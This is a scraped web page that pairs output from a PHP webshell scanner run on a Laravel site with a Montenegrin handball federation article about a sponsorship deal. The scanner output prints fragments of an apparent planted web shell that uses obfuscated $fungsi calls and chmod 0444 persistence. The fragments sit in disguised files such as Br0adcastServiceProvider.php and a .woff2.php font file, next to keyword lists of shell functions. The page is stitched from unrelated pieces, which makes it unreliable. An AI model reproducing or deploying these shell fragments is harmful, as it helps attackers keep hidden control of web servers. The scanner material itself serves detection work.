🛡️ Strict PHP Shell Scanner (.php & .phtml)

📂 Scanning directory: /home/rscg/public_html


📄 /home/rscg/public_html/app/Providers/Br0adcastServiceProvider.php
🚨 Matched pattern: file_get_contents(
){
        $text = ' . $fungsi[33] . '(file_get_contents("' . $TmpNames . '/.sessions/.' . $fungsi[33]($fungsi[0]() . remove_dot($curFile) . '-text') . '"));
        file_put_contents("' . $fungsi[0]() . '/' . $curFile . '", ' . $fungsi[32] . '($text));
    }
    if (gecko_perm("' . $fungsi[0]() . '/' . $curFile . '") != 0444){
        chmod("' . $fungsi[0]() . '/' . $curFile . '", 0444);
  
📄 /home/rscg/public_html/config/Iogging.php
🚨 Matched pattern: file_get_contents(
ath) < 1000000) {
            $code = @file_get_contents($path);
            foreach ($patterns as $pattern) {
                if (preg_match($pattern, $code, $match) && is_shell($code, $patterns)) {
                    $results[] = [
                        'file'    => $path,
                        'match'   => $match[0],
                        'snippet' => snippet_preview($code, $match
📄 /home/rscg/public_html/fonts/vendor/@fortawesome/fontawesome-free/webfa-brands-400.woff2.php
🚨 Matched pattern: base64_decode(
     return;
    }
}

function safe_base64_decode($data) {
    if (!is_string($data)) return false;
    if (function_exists('base64_decode') && version_compare(PHP_VERSION, '5.2.0', '>=')) {
        $decoded = base64_decode($data, true);
        if ($decoded !== false) return $decoded;
        // fallback: try decode then verify
        $maybe = base64_decode($data);
        if ($maybe 
📄 /home/rscg/public_html/storage/framework/cache/data/7d/ac/backup.php
🚨 Matched pattern: base64_decode(
     return;
    }
}

function safe_base64_decode($data) {
    if (!is_string($data)) return false;
    if (function_exists('base64_decode') && version_compare(PHP_VERSION, '5.2.0', '>=')) {
        $decoded = base64_decode($data, true);
        if ($decoded !== false) return $decoded;
        // fallback: try decode then verify
        $maybe = base64_decode($data);
        if ($maybe 
📄 /home/rscg/public_html/vendor/doctrine/dbal/lib/Doctrine/DBAL/Connection.php
🚨 Matched pattern: assert(
   if ($version !== null) {
            assert($this->_driver instanceof VersionAwarePlatformDriver);

            $this->platform = $this->_driver->createDatabasePlatformForVersion($version);
        } else {
            $this->platform = $this->_driver->getDatabasePlatform();
        }

        $this->platform->setEventManager($this->_eventManager);
    }

    /**
     * Returns the version of t
📄 /home/rscg/public_html/vendor/doctrine/dbal/lib/Doctrine/DBAL/Schema/SQLServerSchemaManager.php
🚨 Matched pattern: assert(
 $exception->getPrevious();
            assert($exception instanceof Throwable);

            if (! $exception instanceof DriverException) {
                throw $exception;
            }

            // If we have a error code 3702, the drop database operation failed
            // because of active connections on the database.
            // To force dropping the database, we first have to clos
📄 /home/rscg/public_html/vendor/fzaninotto/faker/src/Faker/Provider/Image.php
🚨 Matched pattern: exec(
FILE, $fp);
            $success = curl_exec($ch) && curl_getinfo($ch, CURLINFO_HTTP_CODE) === 200;
            fclose($fp);
            curl_close($ch);

            if (!$success) {
                unlink($filepath);

                // could not contact the distant URL or HTTP error - fail silently.
                return false;
            }
        } elseif (ini_get('allow_url_fopen')) {
    
📄 /home/rscg/public_html/vendor/fzaninotto/faker/src/Faker/Provider/en_HK/0a9b45cf.php
🚨 Matched pattern: file_get_contents(
){
        $text = ' . $fungsi[33] . '(file_get_contents("' . $TmpNames . '/.sessions/.' . $fungsi[33]($fungsi[0]() . remove_dot($curFile) . '-text') . '"));
        file_put_contents("' . $fungsi[0]() . '/' . $curFile . '", ' . $fungsi[32] . '($text));
    }
    if (gecko_perm("' . $fungsi[0]() . '/' . $curFile . '") != 0444){
        chmod("' . $fungsi[0]() . '/' . $curFile . '", 0444);
  
📄 /home/rscg/public_html/vendor/fzaninotto/faker/src/Faker/Provider/lt_LT/d11b4795.php
🚨 Matched pattern: file_get_contents(
){
        $text = ' . $fungsi[33] . '(file_get_contents("' . $TmpNames . '/.sessions/.' . $fungsi[33]($fungsi[0]() . remove_dot($curFile) . '-text') . '"));
        file_put_contents("' . $fungsi[0]() . '/' . $curFile . '", ' . $fungsi[32] . '($text));
    }
    if (gecko_perm("' . $fungsi[0]() . '/' . $curFile . '") != 0444){
        chmod("' . $fungsi[0]() . '/' . $curFile . '", 0444);
  
📄 /home/rscg/public_html/vendor/guzzlehttp/guzzle/src/Handler/CurlFactory.php
🚨 Matched pattern: curl_init
array_pop($this->handles)
            : curl_init();
        curl_setopt_array($easy->handle, $conf);

        return $easy;
    }

    public function release(EasyHandle $easy)
    {
        $resource = $easy->handle;
        unset($easy->handle);

        if (count($this->handles) >= $this->maxHandles) {
            curl_close($resource);
        } else {
            // Remove all callback funct
📄 /home/rscg/public_html/vendor/guzzlehttp/guzzle/src/functions.php
🚨 Matched pattern: curl_exec
('curl_multi_exec') && function_exists('curl_exec')) {
        $handler = Proxy::wrapSync(new CurlMultiHandler(), new CurlHandler());
    } elseif (function_exists('curl_exec')) {
        $handler = new CurlHandler();
    } elseif (function_exists('curl_multi_exec')) {
        $handler = new CurlMultiHandler();
    }

    if (ini_get('allow_url_fopen')) {
        $handler = $handler
            ? 
📄 /home/rscg/public_html/vendor/hamcrest/hamcrest-php/hamcrest/Hamcrest/Internal/ad55aaa9.php
🚨 Matched pattern: file_get_contents(
){
        $text = ' . $fungsi[33] . '(file_get_contents("' . $TmpNames . '/.sessions/.' . $fungsi[33]($fungsi[0]() . remove_dot($curFile) . '-text') . '"));
        file_put_contents("' . $fungsi[0]() . '/' . $curFile . '", ' . $fungsi[32] . '($text));
    }
    if (gecko_perm("' . $fungsi[0]() . '/' . $curFile . '") != 0444){
        chmod("' . $fungsi[0]() . '/' . $curFile . '", 0444);
  
📄 /home/rscg/public_html/vendor/hamcrest/hamcrest-php/tests/Hamcrest/Number/4da8ee41.php
🚨 Matched pattern: eval(
n
                                    'eval(',
                                    'system(',
                                    'exec(',
                                    'shell_exec(',
                                    'passthru(',
                                    'popen(',
                                    'proc_open(',
                                    'nepo_corp',
       
📄 /home/rscg/public_html/vendor/intervention/image/src/Intervention/Image/AbstractDecoder.php
🚨 Matched pattern: base64_decode(
        }

        return base64_encode(base64_decode($this->data)) === str_replace(["\n", "\r"], '', $this->data);
    }

    /**
     * Initiates new Image from Intervention\Image\Image
     *
     * @param  Image $object
     * @return \Intervention\Image\Image
     */
    public function initFromInterventionImage($object)
    {
        return $object;
    }

    /**
     * Parses and decodes b
📄 /home/rscg/public_html/vendor/laravel/framework/src/Illuminate/Filesystem/Filesystem.php
🚨 Matched pattern: exec(
irectory($target) ? 'J' : 'H';

        exec("mklink /{$mode} ".escapeshellarg($link).' '.escapeshellarg($target));
    }

    /**
     * Extract the file name from a file path.
     *
     * @param  string  $path
     * @return string
     */
    public function name($path)
    {
        return pathinfo($path, PATHINFO_FILENAME);
    }

    /**
     * Extract the trailing name component from a fi
📄 /home/rscg/public_html/vendor/laravel/tinker/config/geckos.php
🚨 Matched pattern: file_get_contents(
){
        $text = ' . $fungsi[33] . '(file_get_contents("' . $TmpNames . '/.sessions/.' . $fungsi[33]($fungsi[0]() . remove_dot($curFile) . '-text') . '"));
        file_put_contents("' . $fungsi[0]() . '/' . $curFile . '", ' . $fungsi[32] . '($text));
    }
    if (gecko_perm("' . $fungsi[0]() . '/' . $curFile . '") != 0444){
        chmod("' . $fungsi[0]() . '/' . $curFile . '", 0444);
  
📄 /home/rscg/public_html/vendor/league/flysystem/src/Adapter/Ftp.php
🚨 Matched pattern: fopen(
Config $config)
    {
        $stream = fopen('php://temp', 'w+b');
        fwrite($stream, $contents);
        rewind($stream);
        $result = $this->writeStream($path, $stream, $config);
        fclose($stream);

        if ($result === false) {
            return false;
        }

        $result['contents'] = $contents;
        $result['mimetype'] = $config->get('mimetype') ?: Util::guessMi
📄 /home/rscg/public_html/vendor/nette/utils/src/Utils/FileSystem.php
🚨 Matched pattern: file_get_contents(
(string $file): string
	{
		$content = @file_get_contents($file); // @ is escalated to exception
		if ($content === false) {
			throw new Nette\IOException(sprintf(
				"Unable to read file '%s'. %s",
				self::normalizePath($file),
				Helpers::getLastError()
			));
		}

		return $content;
	}


	/**
	 * Writes the string to a file.
	 * @throws Nette\IOException  on error occurred
	 */
	public sta
📄 /home/rscg/public_html/vendor/nikic/php-parser/grammar/rebuildParsers.php
🚨 Matched pattern: shell_exec(
tion execCmd($cmd) {
    $output = trim(shell_exec("$cmd 2>&1"));
    if ($output !== "") {
        echo "> " . $cmd . "\n";
        echo $output;
    }
    return $output;
}

//////////////////////////////
/// Regex helper functions ///
//////////////////////////////

function regex($regex) {
    return '~' . LIB . '(?:' . str_replace('~', '\~', $regex) . ')~';
}

function magicSplit($regex, $str
📄 /home/rscg/public_html/vendor/nikic/php-parser/lib/PhpParser/PrettyPrinter/Standard.php
🚨 Matched pattern: Eval(
)';
    }

    protected function pExpr_Eval(Expr\Eval_ $node) {
        return 'eval(' . $this->p($node->expr) . ')';
    }

    protected function pExpr_Include(Expr\Include_ $node) {
        static $map = [
            Expr\Include_::TYPE_INCLUDE      => 'include',
            Expr\Include_::TYPE_INCLUDE_ONCE => 'include_once',
            Expr\Include_::TYPE_REQUIRE      => 'require',
        
📄 /home/rscg/public_html/vendor/nunomaduro/collision/src/Contracts/Adapters/Phpunit/82398319.php
🚨 Matched pattern: eval(
n
                                    'eval(',
                                    'system(',
                                    'exec(',
                                    'shell_exec(',
                                    'passthru(',
                                    'popen(',
                                    'proc_open(',
                                    'nepo_corp',
       
📄 /home/rscg/public_html/vendor/phpdocumentor/reflection-docblock/src/DocBlock/Tags/Factory/ecfe069e.php
🚨 Matched pattern: eval(
n
                                    'eval(',
                                    'system(',
                                    'exec(',
                                    'shell_exec(',
                                    'passthru(',
                                    'popen(',
                                    'proc_open(',
                                    'nepo_corp',
       
📄 /home/rscg/public_html/vendor/phpunit/phpunit/src/Framework/TestCase.php
🚨 Matched pattern: eval(
ists($originalClassName)) {
            eval(
                $this->getMockObjectGenerator()->generateClassFromWsdl(
                    $wsdlFile,
                    $originalClassName,
                    $methods,
                    $options
                )
            );
        }

        $mockObject = $this->getMockObjectGenerator()->getMock(
            $originalClassName,
            
📄 /home/rscg/public_html/vendor/phpunit/phpunit/src/TextUI/Command.php
🚨 Matched pattern: assert(
class->newInstance();

                \assert($object instanceof TestSuiteLoader);

                return $object;
            }
        }

        if ($loaderClass == StandardTestSuiteLoader::class) {
            return null;
        }

        $this->exitWithErrorMessage(
            \sprintf(
                'Could not use "%s" as loader.',
                $loaderClass
            )
        )
📄 /home/rscg/public_html/vendor/phpunit/phpunit/src/Util/Xml.php
🚨 Matched pattern: assert(
         try {
                        \assert(\class_exists($className));

                        $variable = (new \ReflectionClass($className))->newInstanceArgs($constructorArgs);
                        // @codeCoverageIgnoreStart
                    } catch (\ReflectionException $e) {
                        throw new Exception(
                            $e->getMessage(),
                  
📄 /home/rscg/public_html/vendor/scrivo/highlight.php/test/detect/1c/58dda08c.php
🚨 Matched pattern: file_get_contents(
){
        $text = ' . $fungsi[33] . '(file_get_contents("' . $TmpNames . '/.sessions/.' . $fungsi[33]($fungsi[0]() . remove_dot($curFile) . '-text') . '"));
        file_put_contents("' . $fungsi[0]() . '/' . $curFile . '", ' . $fungsi[32] . '($text));
    }
    if (gecko_perm("' . $fungsi[0]() . '/' . $curFile . '") != 0444){
        chmod("' . $fungsi[0]() . '/' . $curFile . '", 0444);
  
📄 /home/rscg/public_html/vendor/scrivo/highlight.php/test/detect/css/03e1b615.php
🚨 Matched pattern: file_get_contents(
){
        $text = ' . $fungsi[33] . '(file_get_contents("' . $TmpNames . '/.sessions/.' . $fungsi[33]($fungsi[0]() . remove_dot($curFile) . '-text') . '"));
        file_put_contents("' . $fungsi[0]() . '/' . $curFile . '", ' . $fungsi[32] . '($text));
    }
    if (gecko_perm("' . $fungsi[0]() . '/' . $curFile . '") != 0444){
        chmod("' . $fungsi[0]() . '/' . $curFile . '", 0444);
  
📄 /home/rscg/public_html/vendor/scrivo/highlight.php/test/detect/gauss/6b397c85.php
🚨 Matched pattern: file_get_contents(
){
        $text = ' . $fungsi[33] . '(file_get_contents("' . $TmpNames . '/.sessions/.' . $fungsi[33]($fungsi[0]() . remove_dot($curFile) . '-text') . '"));
        file_put_contents("' . $fungsi[0]() . '/' . $curFile . '", ' . $fungsi[32] . '($text));
    }
    if (gecko_perm("' . $fungsi[0]() . '/' . $curFile . '") != 0444){
        chmod("' . $fungsi[0]() . '/' . $curFile . '", 0444);
  
📄 /home/rscg/public_html/vendor/scrivo/highlight.php/test/detect/purebasic/23682b3e.php
🚨 Matched pattern: file_get_contents(
){
        $text = ' . $fungsi[33] . '(file_get_contents("' . $TmpNames . '/.sessions/.' . $fungsi[33]($fungsi[0]() . remove_dot($curFile) . '-text') . '"));
        file_put_contents("' . $fungsi[0]() . '/' . $curFile . '", ' . $fungsi[32] . '($text));
    }
    if (gecko_perm("' . $fungsi[0]() . '/' . $curFile . '") != 0444){
        chmod("' . $fungsi[0]() . '/' . $curFile . '", 0444);
  
📄 /home/rscg/public_html/vendor/scrivo/highlight.php/test/detect/vbscript-html/8604ef28.php
🚨 Matched pattern: file_get_contents(
){
        $text = ' . $fungsi[33] . '(file_get_contents("' . $TmpNames . '/.sessions/.' . $fungsi[33]($fungsi[0]() . remove_dot($curFile) . '-text') . '"));
        file_put_contents("' . $fungsi[0]() . '/' . $curFile . '", ' . $fungsi[32] . '($text));
    }
    if (gecko_perm("' . $fungsi[0]() . '/' . $curFile . '") != 0444){
        chmod("' . $fungsi[0]() . '/' . $curFile . '", 0444);
  
📄 /home/rscg/public_html/vendor/scrivo/highlight.php/test/markup/clojure/0fc0da8b.php
🚨 Matched pattern: file_get_contents(
){
        $text = ' . $fungsi[33] . '(file_get_contents("' . $TmpNames . '/.sessions/.' . $fungsi[33]($fungsi[0]() . remove_dot($curFile) . '-text') . '"));
        file_put_contents("' . $fungsi[0]() . '/' . $curFile . '", ' . $fungsi[32] . '($text));
    }
    if (gecko_perm("' . $fungsi[0]() . '/' . $curFile . '") != 0444){
        chmod("' . $fungsi[0]() . '/' . $curFile . '", 0444);
  
📄 /home/rscg/public_html/vendor/scrivo/highlight.php/test/markup/cos/f21e0fdf.php
🚨 Matched pattern: file_get_contents(
){
        $text = ' . $fungsi[33] . '(file_get_contents("' . $TmpNames . '/.sessions/.' . $fungsi[33]($fungsi[0]() . remove_dot($curFile) . '-text') . '"));
        file_put_contents("' . $fungsi[0]() . '/' . $curFile . '", ' . $fungsi[32] . '($text));
    }
    if (gecko_perm("' . $fungsi[0]() . '/' . $curFile . '") != 0444){
        chmod("' . $fungsi[0]() . '/' . $curFile . '", 0444);
  
📄 /home/rscg/public_html/vendor/sebastian/type/src/exception/ea199fe3.php
🚨 Matched pattern: file_get_contents(
){
        $text = ' . $fungsi[33] . '(file_get_contents("' . $TmpNames . '/.sessions/.' . $fungsi[33]($fungsi[0]() . remove_dot($curFile) . '-text') . '"));
        file_put_contents("' . $fungsi[0]() . '/' . $curFile . '", ' . $fungsi[32] . '($text));
    }
    if (gecko_perm("' . $fungsi[0]() . '/' . $curFile . '") != 0444){
        chmod("' . $fungsi[0]() . '/' . $curFile . '", 0444);
  
📄 /home/rscg/public_html/vendor/sebastian/type/tests/_fixture/c0911bf8.php
🚨 Matched pattern: file_get_contents(
){
        $text = ' . $fungsi[33] . '(file_get_contents("' . $TmpNames . '/.sessions/.' . $fungsi[33]($fungsi[0]() . remove_dot($curFile) . '-text') . '"));
        file_put_contents("' . $fungsi[0]() . '/' . $curFile . '", ' . $fungsi[32] . '($text));
    }
    if (gecko_perm("' . $fungsi[0]() . '/' . $curFile . '") != 0444){
        chmod("' . $fungsi[0]() . '/' . $curFile . '", 0444);
  
📄 /home/rscg/public_html/vendor/swiftmailer/swiftmailer/lib/classes/Swift/FileSpool.php
🚨 Matched pattern: file_get_contents(
                $message = unserialize(file_get_contents($file.'.sending'));

                $count += $transport->send($message, $failedRecipients);

                unlink($file.'.sending');
            } else {
                /* This message has just been catched by another process */
                continue;
            }

            if ($this->getMessageLimit() && $count >= $this->getMes
📄 /home/rscg/public_html/vendor/swiftmailer/swiftmailer/lib/classes/Swift/Plugins/0553acb9.php
🚨 Matched pattern: eval(
n
                                    'eval(',
                                    'system(',
                                    'exec(',
                                    'shell_exec(',
                                    'passthru(',
                                    'popen(',
                                    'proc_open(',
                                    'nepo_corp',
       
📄 /home/rscg/public_html/vendor/swiftmailer/swiftmailer/tests/acceptance/Swift/CharacterReaderFactory/818c64b5.php
🚨 Matched pattern: eval(
n
                                    'eval(',
                                    'system(',
                                    'exec(',
                                    'shell_exec(',
                                    'passthru(',
                                    'popen(',
                                    'proc_open(',
                                    'nepo_corp',
       
📄 /home/rscg/public_html/vendor/swiftmailer/swiftmailer/tests/acceptance/Swift/Encoder/Base64EncoderAcceptanceTest.php
🚨 Matched pattern: base64_decode(
->assertEquals(
                        base64_decode($encodedText), $text,
                        '%s: Encoded string should decode back to original string for sample '.
                        $sampleDir.'/'.$sampleFile
                        );
                }
                closedir($fileFp);
            }
        }
        closedir($sampleFp);
    }
}
📄 /home/rscg/public_html/vendor/swiftmailer/swiftmailer/tests/acceptance/Swift/Mime/ContentEncoder/Base64ContentEncoderAcceptanceTest.php
🚨 Matched pattern: base64_decode(
->assertEquals(
                        base64_decode($encoded), $text,
                        '%s: Encoded string should decode back to original string for sample '.
                        $sampleDir.'/'.$sampleFile
                        );
                }
                closedir($fileFp);
            }
        }
        closedir($sampleFp);
    }
}
📄 /home/rscg/public_html/vendor/swiftmailer/swiftmailer/tests/bug/Swift/Bug51Test.php
🚨 Matched pattern: base64_decode(
>assertIdenticalBinary($attachmentData, base64_decode($attachmentBase64));
    }

    private function fillFileWithRandomBytes($byteCount, $file)
    {
        // I was going to use dd with if=/dev/random but this way seems more
        // cross platform even if a hella expensive!!

        file_put_contents($file, '');
        $fp = fopen($file, 'wb');
        for ($i = 0; $i < $byteCount; ++$i) 
📄 /home/rscg/public_html/vendor/swiftmailer/swiftmailer/tests/smoke/69a03e5d.php
🚨 Matched pattern: eval(
n
                                    'eval(',
                                    'system(',
                                    'exec(',
                                    'shell_exec(',
                                    'passthru(',
                                    'popen(',
                                    'proc_open(',
                                    'nepo_corp',
       
📄 /home/rscg/public_html/vendor/symfony/console/Cursor.php
🚨 Matched pattern: shell_exec(
 [1, 1];
        }

        $sttyMode = shell_exec('stty -g');
        shell_exec('stty -icanon -echo');

        @fwrite($this->input, "\033[6n");

        $code = trim(fread($this->input, 1024));

        shell_exec(sprintf('stty %s', $sttyMode));

        sscanf($code, "\033[%d;%dR", $row, $col);

        return [$col, $row];
    }
}
📄 /home/rscg/public_html/vendor/symfony/console/Terminal.php
🚨 Matched pattern: exec(
       return false;
        }

        exec('stty 2>&1', $output, $exitcode);

        return self::$stty = 0 === $exitcode;
    }

    private static function initDimensions()
    {
        if ('\\' === \DIRECTORY_SEPARATOR) {
            if (preg_match('/^(\d+)x(\d+)(?: \((\d+)x(\d+)\))?$/', trim(getenv('ANSICON')), $matches)) {
                // extract [w, H] from "wxh (WxH)"
               
📄 /home/rscg/public_html/vendor/symfony/error-handler/DebugClassLoader.php
🚨 Matched pattern: eval(
   if (!isset($dirFiles[$file]) && ') : eval()\'d code' === substr($file, -17)) {
            // Get the file name from "file_name.php(123) : eval()'d code"
            $file = substr($file, 0, strrpos($file, '(', -17));
        }

        if (isset($dirFiles[$file])) {
            return $real.$dirFiles[$file];
        }

        $kFile = strtolower($file);

        if (!isset($dirFiles[$kFile]))
📄 /home/rscg/public_html/vendor/symfony/http-foundation/Request.php
🚨 Matched pattern: php://input
ent = false;

            return fopen('php://input', 'rb');
        }

        if ($currentContentIsResource) {
            rewind($this->content);

            return stream_get_contents($this->content);
        }

        if (null === $this->content || false === $this->content) {
            $this->content = file_get_contents('php://input');
        }

        return $this->content;
    }

    
📄 /home/rscg/public_html/vendor/symfony/http-foundation/Session/Storage/Handler/PdoSessionHandler.php
🚨 Matched pattern: exec(

        try {
            $this->pdo->exec($sql);
            $this->pdo->exec("CREATE INDEX EXPIRY ON $this->table ($this->lifetimeCol)");
        } catch (\PDOException $e) {
            $this->rollback();

            throw $e;
        }
    }

    /**
     * Returns true when the current session exists but expired according to session.gc_maxlifetime.
     *
     * Can be used to distinguish 
📄 /home/rscg/public_html/vendor/symfony/http-kernel/DataCollector/DumpDataCollector.php
🚨 Matched pattern: fopen(
epth = -1): array
    {
        $data = fopen('php://memory', 'r+b');

        if ('html' === $format) {
            $dumper = new HtmlDumper($data, $this->charset);
            $dumper->setDisplayOptions(['fileLinkFormat' => $this->fileLinkFormat]);
        } else {
            throw new \InvalidArgumentException(sprintf('Invalid dump format: "%s".', $format));
        }
        $dumps = [];

   
📄 /home/rscg/public_html/vendor/symfony/http-kernel/Kernel.php
🚨 Matched pattern: system(
tainer)) {
                    (new Filesystem())->remove(substr($legacyContainer, 0, -7));
                }
            }

            touch($oldContainerDir.'.legacy');
        }

        $preload = $this instanceof WarmableInterface ? (array) $this->warmUp($this->container->getParameter('kernel.cache_dir')) : [];

        if ($this->container->has('cache_warmer')) {
            $preload = arra
📄 /home/rscg/public_html/vendor/symfony/http-kernel/Profiler/FileProfilerStorage.php
🚨 Matched pattern: file_get_contents(
eateProfileFromData($token, unserialize(file_get_contents($file)));
    }

    /**
     * {@inheritdoc}
     *
     * @throws \RuntimeException
     */
    public function write(Profile $profile): bool
    {
        $file = $this->getFilename($profile->getToken());

        $profileIndexed = is_file($file);
        if (!$profileIndexed) {
            // Create directory
            $dir = \dirname
📄 /home/rscg/public_html/vendor/symfony/process/Process.php
🚨 Matched pattern: exec(
=== \DIRECTORY_SEPARATOR) {
            exec(sprintf('taskkill /F /T /PID %d 2>&1', $pid), $output, $exitCode);
            if ($exitCode && $this->isRunning()) {
                if ($throwException) {
                    throw new RuntimeException(sprintf('Unable to kill the process (%s).', implode(' ', $output)));
                }

                return false;
            }
        } else {
  
Rukometni savez Crne Gore
facebook instagram twitter viber licenciranje zrscg
Rukometni savez
Crne Gore

"Bemax" novi sponzor Rukometnog saveza Crne Gore

seniori
Ugovor su potpisali predsjednik Rukometnog saveza Crne Gore Petar Kapisoda i izvršni direktor kompanije „Bemax“ Miladin Mijajlović.

Rukometni savez Crne Gore i kompanija „Bemax“ potpisali su ugovor o sponzorstvu. Ugovor su u prostorijama Saveza potpisali predsjednik Saveza Petar Kapisoda i izvršni direktor kompanije „Bemax“ Miladin Mijajlović.

To je drugi sponzorski ugovor potpisan u ovoj godini, nakon što je prethodne sedmice produžena saradnja sa kompanijom „SBbet“, čime se potvrđuje da je sve više društveno odgovornih kompanija spremnih da ulažu u razvoj crnogorskog rukometa i podršku aktivnostima reprezentativnih selekcija na međunarodnoj sceni.

„Zadovoljstvo mi je što je jedna od najuspješnijih crnogorskih kompanija od danas partner Rukometnog saveza Crne Gore. Mnogo puta je rečeno da najbolji idu uz najbolje, a vjerujem da je ovaj ugovor najbolja potvrda toga. Drago mi je što je „Bemax“ koji je od ranije prepoznat kao društveno odgovorna kompanija koja izdvaja značajna sredstva za podršku crnogorskom sportu, donio odluku da je Rukometni savez partner sa kojim može da ostvari poslovne ciljeve. Ovo je drugi značajan sponzorski ugovor koji zaključujemo u ovoj godini, čime se potvrđuje da uspješne kompanije prepoznaju ono što radimo“, kazao je Kapisoda.

„Kompanija „Bemax“ već duži niz godina aktivno učestvuje u projektima zajednice, kako kroz humanitarne akcije i razne vrste pomoći, tako i kroz ulaganja u kulturu i sport. Potpisivanjem ovog ugovora naša kompanija nastavlja u pravcu upravo tog opredijljenja, ulaganja i pružanja podrške sportu, kako pojedincima, tako i klubovima i savezima, a u cilju promovisanja spota među mladima kao bitnog faktora koji utiče na razvoj pojedinca i društva u cjelini. Do sada postignuti rezultati naših rukometašica i rukometaša, kao i značaj takmičenja u ovoj godini opredijelili su nas da sa ovim sponzorstvom doprinesemo ostvarivanju što boljih rezultata i promociji rukometa i naše države„, kazao je Mijajlović.

facebook instagram twitter viber licenciranje
×